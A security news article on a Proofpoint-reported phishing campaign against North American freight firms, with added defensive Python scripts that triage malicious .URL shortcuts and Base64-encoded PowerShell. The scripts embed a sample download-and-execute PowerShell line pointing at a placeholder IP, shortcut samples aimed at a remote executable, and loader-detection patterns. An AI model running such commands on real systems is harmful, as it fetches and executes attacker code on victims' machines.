2024-09-25

Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a variety of information stealers and remote access trojans (RATs).

According to Proofpoint, the group behind the campaign uses compromised legitimate email accounts belonging to shipping and freight companies to inject malicious content into existing email conversations.

North American Freight Companies and Malware: Here’s What Happened

Up to 15 email accounts have been identified as being compromised as part of the campaign. It is currently unclear how these accounts were initially compromised or who is behind the attacks.

“The activities that occurred from May to July 2024 predominantly deployed Lumma Stealer, StealC or NetSupport,” the enterprise security firm said in an analysis published Tuesday, adding: “In August 2024, the cybercriminal [or group of cybercriminals] changed tactics by employing new infrastructure and a new distribution technique, also adding payloads to distribute DanaBot and Arechclient2.”

The attack chains involve sending messages with Internet shortcut (.URL) attachments, or Google Drive links that lead to a .URL file, which, once launched, uses Server Message Block (SMB) to retrieve the next-stage payload containing the malware from a remote share.
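A .URL file is a small INI-style text file, so the SMB hand-off described above is visible in the file itself: the `URL=` (or `IconFile=`) value names a remote host, either as a `file://` URL or as a UNC path, and Windows connects to that host over SMB when the shortcut is opened or its icon is rendered. The following triage script is an added example, not Proofpoint's tooling; the shortcut contents it checks are constructed for the example and use documentation-range IP addresses rather than real campaign infrastructure.

```python
"""Triage Windows Internet Shortcut (.URL) files whose target is an SMB/UNC share.

Added example; not Proofpoint's tooling. The shortcut contents below are
constructed, using documentation-range IPs, not artifacts from the campaign.
"""
import re
from urllib.parse import urlparse

# .URL keys that Windows resolves when the shortcut is opened or its icon is rendered.
WATCHED_KEYS = ("url", "iconfile")
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")  # \\host\share\...
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}


def parse_url_file(text):
    """Return the [InternetShortcut] section as {lowercased key: value}."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def remote_smb_host(value):
    """Return the remote host if value names an SMB/UNC location, else None."""
    m = UNC_RE.match(value)
    if m:
        return m.group(1)
    parsed = urlparse(value)
    if parsed.scheme.lower() != "file":
        return None
    host = parsed.netloc
    if not host and parsed.path.startswith("//"):  # file:////host/share/x form
        host = parsed.path[2:].split("/", 1)[0]
    return host if host.lower() not in LOCAL_HOSTS else None


def triage_url_file(text):
    """Return (key, host, value) for every watched key that points at a remote share."""
    fields = parse_url_file(text)
    findings = []
    for key in WATCHED_KEYS:
        value = fields.get(key)
        host = remote_smb_host(value) if value else None
        if host:
            findings.append((key, host, value))
    return findings


# Constructed samples (CRLF line endings, as Windows writes them).
SAMPLES = {
    "benign": "[InternetShortcut]\r\nURL=https://www.example.com/invoice\r\n",
    "file_scheme": "[InternetShortcut]\r\nURL=file://203.0.113.5/share/Invoice_4471.exe\r\nIconIndex=0\r\n",
    "four_slash": "[InternetShortcut]\r\nURL=file:////203.0.113.5/share/Invoice_4471.exe\r\n",
    "unc_path": "[InternetShortcut]\r\nURL=\\\\203.0.113.5\\share\\Invoice_4471.exe\r\n",
    "icon_only": "[InternetShortcut]\r\nURL=https://www.example.com/invoice\r\nIconFile=\\\\198.51.100.7\\icons\\doc.ico\r\n",
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        print(name, triage_url_file(content) or "clean")
```

Run it over .URL attachments pulled from the mail gateway or from a user's Downloads folder; any hit is a shortcut that will make the workstation open an outbound SMB connection to the named host. The same finding should be mirrored at the network edge: outbound TCP 445 to the internet has no business use on an endpoint, and blocking it at egress stops this retrieval step regardless of how the shortcut is delivered.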

Some variants of the campaign observed in August 2024 also used a recently popular technique called ClickFix to trick victims into downloading the DanaBot malware under the pretext of fixing a problem displaying document content in the web browser (in practice not so different from the familiar deceptive links).

Specifically, the lure instructs users to copy and paste a Base64-encoded PowerShell script into a terminal, which triggers the infection chain.
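Because the victim pastes the command themselves, the artifact a defender sees is a PowerShell process whose command line carries the script as a Base64 blob (typically via `-EncodedCommand`, which PowerShell decodes as UTF-16LE, and which it also accepts under any unambiguous prefix such as `-e` or `-enc`). The script below is an added example, not Proofpoint's detection logic: it decodes that layer, follows one further `FromBase64String(...)` layer if present, and reports the loader indicators found in the plaintext. The log lines and the embedded script are constructed for the example.

```python
"""Decode and triage Base64-encoded PowerShell in process command lines.

Added example for ClickFix-style lures; not Proofpoint's detection logic.
The script and log lines below are constructed for the example.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = sorted(("encodedcommand"[:n] for n in range(1, 15)), key=len, reverse=True)
ENC_PARAM_RE = re.compile(
    r"(?i)(?:^|\s)[-/](?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)"
)
INLINE_B64_RE = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
CMDLINE_RE = re.compile(r'CommandLine="([^"]*)"')

# Substrings that typically appear in download-and-execute loaders.
INDICATORS = {
    "iex": re.compile(r"(?i)\biex\b|invoke-expression"),
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "nested_base64": re.compile(r"(?i)frombase64string"),
}


def b64_to_text(token):
    """Decode a Base64 token to text; None if it is not valid Base64 or not text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    # -EncodedCommand is UTF-16LE: ASCII script text has every second byte equal to 0x00.
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16le")
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def decode_encoded_command(cmdline):
    """Return the plaintext script passed via -EncodedCommand, or None if absent/undecodable."""
    m = ENC_PARAM_RE.search(cmdline)
    return b64_to_text(m.group(1)) if m else None


def triage_command_line(cmdline):
    """Decode encoded layers and report which loader indicators they contain."""
    decoded = decode_encoded_command(cmdline)
    layers = [cmdline] + ([decoded] if decoded else [])
    # Follow one more level: string literals handed to [Convert]::FromBase64String(...).
    for token in INLINE_B64_RE.findall("\n".join(layers)):
        inner = b64_to_text(token)
        if inner:
            layers.append(inner)
    text = "\n".join(layers)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": decoded, "indicators": hits}


def triage_log_line(line):
    """Pull CommandLine="..." out of a key=value process-creation log line and triage it."""
    m = CMDLINE_RE.search(line)
    return triage_command_line(m.group(1)) if m else None


# Constructed sample: what a ClickFix page asks the victim to paste, and the resulting log line.
SAMPLE_SCRIPT = "$u='http://203.0.113.5/fix.txt';iex (New-Object Net.WebClient).DownloadString($u)"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
SAMPLE_LOGS = [
    'EventID=1 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -NoP -W Hidden -enc ' + SAMPLE_ENC + '"',
    'EventID=1 ParentImage=C:\\Windows\\System32\\svchost.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly_backup.ps1"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(triage_log_line(line))
```

The useful signal is the combination: a hidden window, an encoded command, and a decoded body that fetches and evaluates remote content. A scheduled-task or admin invocation like the second sample carries none of those. Note that the first sample's parent is explorer.exe, which is what a paste into the Run dialog or a freshly opened console looks like, whereas legitimate encoded commands are far more often spawned by management agents.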

The transport companies that were targeted

“These campaigns impersonated Samsara, AMB Logistic and Astra TMS – software that would be used only in the management of transport and fleet operations,” Proofpoint said, adding: “The specific targeting and compromises of organizations in the transportation and logistics industry, as well as the use of decoys impersonating software specifically designed for freight operations and fleet management, indicate that the author(s) likely researches the target companies’ operations before sending the campaigns.”

The disclosure comes at a time when new information-stealing malware families keep emerging, among them Angry Stealer, BLX Stealer (also known as XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxurious, Poseidon, Powershell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer and a CryptBot variant dubbed Yet Another Silly Stealer (YASS).

It also follows the emergence of a new version of the RomCom RAT called SnipBot, a successor to PEAPOD (also known as RomCom 4.0), distributed via fake links embedded in phishing emails; some aspects of the campaign had previously been highlighted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.

“SnipBot provides the attacker with the ability to execute commands and download additional modules onto the victim’s system,” said Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel, who went on to say: “The initial payload is always either an executable downloader disguised as a PDF file or a real PDF file sent to the victim via email that leads to an executable.”

While systems infected with RomCom have also seen ransomware deployed in the past, the cybersecurity firm noted the absence of this behavior, raising the possibility that the threat actor behind the malware, Tropical Scorpius (also known as Void Rabisu), has shifted from pure financial gain to espionage.

What do you think about this attack on transport companies? Let us know in the comments.